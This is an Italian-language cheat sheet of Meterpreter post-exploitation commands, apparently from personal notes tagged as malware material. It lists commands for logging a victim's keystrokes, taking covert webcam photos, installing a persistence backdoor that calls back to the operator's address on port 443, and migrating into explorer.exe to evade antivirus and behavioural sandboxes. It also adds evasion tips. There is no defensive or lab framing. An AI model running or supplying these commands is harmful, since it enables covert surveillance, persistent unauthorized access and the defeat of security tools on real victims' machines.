tags: Metasploit_Malware metasploit Malware_Fileless


1. 🔹 Keylogger

Per avviare un keylogger su una sessione Meterpreter aperta:

meterpreter > keyscan_start # Lascia lavorare l'utente un po', poi raccogli i tasti digitati: meterpreter > keyscan_dump

2. 🔹 Webcam Spying

Scattare foto dalla webcam (se presente e attiva):

meterpreter > webcam_list meterpreter > webcam_snap

3. 🔹 Persistenza (Backdoor)

Creare backdoor persistenti sulla macchina vittima:

meterpreter > run persistence -U -i 30 -p 443 -r tuo_indirizzo_ip

(Attenzione: Alcuni antivirus moderni rilevano facilmente questo modulo standard; è più efficace migrare processi o utilizzare tecniche avanzate come scripting PowerShell personalizzato.)

4. 🔹 Migrazione processo (per evasione AV)

Spostarsi in un processo sicuro (es. explorer.exe) per nascondersi dagli antivirus:

meterpreter > ps meterpreter > migrate <PID explorer.exe>

Questa tecnica aiuta a sfuggire alla detection e ai sandbox di analisi comportamentale.